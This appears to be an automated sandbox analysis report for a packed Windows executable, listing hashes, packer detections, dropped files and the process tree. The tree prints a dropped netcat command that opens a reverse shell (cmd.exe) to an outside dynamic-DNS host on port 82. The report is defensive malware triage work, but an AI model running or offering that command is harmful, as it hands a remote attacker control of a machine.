4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
20/07/2024, 08:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
Size

1.3MB
MD5

5fce41613d2bb16e353e5546106568a0
SHA1

f8d76096e8cffe9ded2f1db2baf92e6a2d8edd02
SHA256

4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b
SHA512

ce18f167146c13a5a328b8caa5cc774eec6543f37054ff2da261dab4190766d45249aa0b3a5f35d9d0d0ac0002c89465cb93757aca94f17d40b59a11243a18a7
SSDEEP

24576:ttWcmES7iPyMHnz0iI85ZDuGX88PHKEHZyCyLyub8LlRHYt9N+KsTOrJZ:to797iKMHoi3PDXVPfHghyub8LL69NQ2

Score

7^/10

themida upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2220	nc1.exe

Loads dropped DLL 2 IoCs

pid	Process
3060	cmd.exe
3060	cmd.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0008000000016d56-23.dat	themida
behavioral1/memory/2220-29-0x0000000000400000-0x0000000000518000-memory.dmp	themida

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2068-0-0x0000000000400000-0x000000000057B000-memory.dmp	upx
behavioral1/memory/2068-34-0x0000000000400000-0x000000000057B000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2068 wrote to memory of 3060	2068	5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe	30
PID 2068 wrote to memory of 3060	2068	5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe	30
PID 2068 wrote to memory of 3060	2068	5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe	30
PID 2068 wrote to memory of 3060	2068	5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe	30
PID 3060 wrote to memory of 2220	3060	cmd.exe	32
PID 3060 wrote to memory of 2220	3060	cmd.exe	32
PID 3060 wrote to memory of 2220	3060	cmd.exe	32
PID 3060 wrote to memory of 2220	3060	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\C41A.tmp\moi.bat" C:\Users\Admin\AppData\Local\Temp\"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Users\Admin\AppData\Local\Temp\C41A.tmp\nc1.exe
    nc1 -d -e cmd.exe subprog.no-ip.biz 82
    3⤵
    - Executes dropped EXE
    PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C41A.tmp\moi.bat

Filesize
55B

MD5
b10865d09b79c801d0ed79c38e1148b2

SHA1
927d484b37376dcb0a8223f89f06923664f75d3d

SHA256
7478f318af4b1dcb082609f0019ae994b58b8fc0e7ac2c278d9547c71c7fabf8

SHA512
89c21f6aec91738a60e9a849e0b0ceca330dab365b2c36e1c62a84b940bfd6921bb19381d5acfad18e169f4dd1ba0d2a85d5f0bdea1e3e721535c76e3c437768

Download Submit
C:\Users\Admin\AppData\Local\Temp\C41A.tmp\nc1.exe

Filesize
1.1MB

MD5
a5923f2e7efaf747844e530baa7fe32a

SHA1
285559a6bf798ce6e9a49a1db2795d89e12675a7

SHA256
9dfaaa97fa17a13a490f3892bd4b3cb7c4424ab3607dcc00c3ab88987b7d7e30

SHA512
fc8e9589cf0dc8b86f4a8f79619d0844cb2651342e049630fe6e6a22dbde65151c0571ac521e8823e5c5aeb3219c7b780f928b146bb6c2d673674235bdaf542e

Download Submit
memory/2068-0-0x0000000000400000-0x000000000057B000-memory.dmp

Filesize
1.5MB

Download
memory/2068-34-0x0000000000400000-0x000000000057B000-memory.dmp

Filesize
1.5MB

Download
memory/2220-27-0x0000000001D20000-0x0000000001E04000-memory.dmp

Filesize
912KB

Download
memory/2220-26-0x0000000000280000-0x0000000000281000-memory.dmp

Filesize
4KB

Download
memory/2220-28-0x0000000000401000-0x0000000000409000-memory.dmp

Filesize
32KB

Download
memory/2220-29-0x0000000000400000-0x0000000000518000-memory.dmp

Filesize
1.1MB

Download